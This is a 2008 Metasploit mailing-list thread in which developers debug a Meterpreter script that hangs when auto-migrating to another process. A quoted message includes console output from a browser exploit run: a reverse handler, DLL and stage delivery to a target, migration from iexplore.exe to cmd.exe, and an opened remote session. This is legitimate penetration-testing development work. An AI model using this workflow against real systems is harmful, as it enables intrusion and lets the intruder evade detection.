Meterpreter script to auto-migrate

[metasploit at backstep.net (Lukas Kuzmiak)]

I can confirm this, it hangs up on command execution, it seems there
are 2 problems here, one with command execution as AutoRunScript (but
scraper.rb seems to work fine as AutoRun so i dunno) and the other
with migration to another process at some OS (i have had some problems
with vista and w2k8 server too, maybe it wasnt planned to run on this
systems, i just want to let u know what i've found).

lukash

On Sat, Dec 13, 2008 at 6:25 PM, natron <natron at invisibledenizen.org> wrote:
> On Sat, Dec 13, 2008 at 10:46 AM, H D Moore <hdm at metasploit.com> wrote:
> > On Saturday 13 December 2008, natron wrote:
> > > I think this may be a combination of two bugs, one is known and
> > > labeled in the code, but I think the other one is new.
> > >
> > > 1) When I run it with AutoRunScript it hangs on the
> > > client.sys.process.execute call.  Is it possible that something with
> > > the client object isn't set up until you do an "interact -i #"?  It
> > > works almost 100% of the time for me within a session.  If that's it,
> > > would it be possible to manually set up the client object somehow?
> >
> > A migrate in the AutoRunScript before the session is setup may break some
> > of the initialization code, I opened ticket #266 to track it.
>
> It doesn't appear to be a problem with the migrate code; it's getting
> hung up on the code to execute a new process.  To double check, I
> verified the original migrate.rb script still works as an
> AutoRunScript:
>
> The migrate code appears to work, it's the call to execute a new
> process that hangs up.  Using the scripts/meterpreter/migrate.rb
> (modified to migrate to cmd.exe rather than lsass.exe):
>
> msf exploit(ie_xml_corruption) > exploit
> [*] Exploit running as background job.
> msf exploit(ie_xml_corruption) >
> [*] Handler binding to LHOST 192.168.1.112
> [*] Started reverse handler
> [*] Using URL: http://192.168.1.112:8080/ie-xml-corruption.html
> [*] Server started.
> [*] Sending HTML to 192.168.1.108:2060...
> [*] Sending DLL to 192.168.1.108:2060...
> [*] Transmitting intermediate stager for over-sized stage...(191 bytes)
> [*] Sending stage (2650 bytes)
> [*] Sleeping before handling stage...
> [*] Uploading DLL (75787 bytes)...
> [*] Upload completed.
> [*] Migrating to cmd.exe...
> [*] Current server process: iexplore.exe (3564)
> [*] New server process: cmd.exe (3848)
> [*] Meterpreter session 1 opened (192.168.1.112:4444 -> 192.168.1.108:2062)
> _______________________________________________
> http://spool.metasploit.com/mailman/listinfo/framework



-- 
Only wimps use tape backup: _real_ men just upload their important
stuff on ftp, and let the rest of the world mirror it ;). Torvalds,
Linus (1996-07-20).